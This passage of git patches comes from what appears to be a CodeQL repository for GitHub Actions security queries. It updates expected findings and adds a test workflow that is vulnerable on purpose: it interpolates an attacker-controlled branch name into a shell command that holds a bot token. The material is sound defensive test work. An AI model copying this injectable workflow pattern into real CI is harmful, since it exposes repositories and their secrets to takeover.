($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b3747..0d5cd4086a7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,22 +1,22 @@ -| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test13.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout2.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | From 24a3df03869b741d6051194569433b1eb0723b13 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 13:41:23 +0100 Subject: [PATCH 0644/1267] tests: new tests for Code Injection --- .../.github/workflows/publishResults.yml | 80 +++++++++++++++++++ .../CWE-094/.github/workflows/test22.yml | 12 +++ .../CWE-094/CodeInjectionCritical.expected | 8 ++ 3 files changed, 100 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml new file mode 100644 index 00000000000..17d9680d907 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -0,0 +1,80 @@ +on: + workflow_call: + inputs: + botGithubId: + description: bot id + type: string + required: true + + secrets: + githubBotPAT: + description: The personal access token + required: true + +permissions: {} # all none + +jobs: + versions-check-result: + name: Publish Results + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion != 'skipped' + steps: + + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + id: search-patch + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + run_id: context.payload.workflow_run.id, + ...context.repo + }) + let artifact = allArtifacts.data.artifacts.find(artifact => artifact.name == 'git-patch') + return artifact?.id + + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + if: steps.search-patch.outputs.result + with: + ref: '${{ github.event.workflow_run.head_sha }}' + persist-credentials: false #Opt out from persisting the default Github-token authentication in order to enable use of the bot's PAT when pushing below + + - name: Download git patch + uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + id: fetch-patch + if: steps.search-patch.outputs.result + with: + script: | + let download = await github.rest.actions.downloadArtifact({ + artifact_id: ${{ steps.search-patch.outputs.result }}, + archive_format: 'zip', + ...context.repo + }) + let fs = require('fs') + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/patch.zip`, Buffer.from(download.data)) + await exec.exec('unzip', ['patch.zip']) + let pr_number = Number(fs.readFileSync('github_pull_request_number.txt')) + core.setOutput('pull_request_number', pr_number) + await io.rmRF('patch.zip') + await io.rmRF('github_pull_request_number.txt') + + - name: Apply and push version increment + id: git-commit + if: steps.search-patch.outputs.result + run: | + fileList=$(git diff-tree --no-commit-id --name-only HEAD -r) + echo "file-list<> $GITHUB_OUTPUT + echo "$fileList" >> $GITHUB_OUTPUT + echo "EOF" >> $GITHUB_OUTPUT + + git push \ + "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' + env: + BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} + + - name: Add or update information comment + uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + if: always() + with: + github-token: ${{ secrets.githubBotPAT }} + script: | + const fileList = `${{ steps.git-commit.outputs.file-list }}` diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml new file mode 100644 index 00000000000..52f7e8964c1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml @@ -0,0 +1,12 @@ +on: + workflow_run: + workflows: [ 'Pull-Request Checks' ] + types: [ completed ] + +jobs: + publish-results: + uses: TestOrg/TestRepo/.github/workflows/publishResults.yml@master + with: + botGithubId: bot + secrets: + githubBotPAT: ${{ secrets.BOT_PAT }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index dad99f0029a..5187e875cb7 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -13,6 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | @@ -232,6 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -617,6 +623,8 @@ subpaths | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | From ee7e50c1cf5787f0a129863d81eea34972e39c0a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 13:42:02 +0100 Subject: [PATCH 0645/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 29687dd7a06..9554a52d934 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.78 +version: 0.1.79 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7b88d83d38e..f6fe9791a93 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.78 +version: 0.1.79 groups: [actions, queries] suites: codeql-suites extractor: javascript From 871193095a9eb55a4117f126576bd912df9bad8f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:04:02 +0100 Subject: [PATCH 0646/1267] feat: Add trigger event to cache poisoning queries --- .../Security/CWE-349/CachePoisoningViaDirectCache.ql | 3 ++- .../Security/CWE-094/CodeInjectionMedium.expected | 6 ++++++ .../CWE-349/CachePoisoningViaDirectCache.expected | 12 ++++++------ 3 files changed, 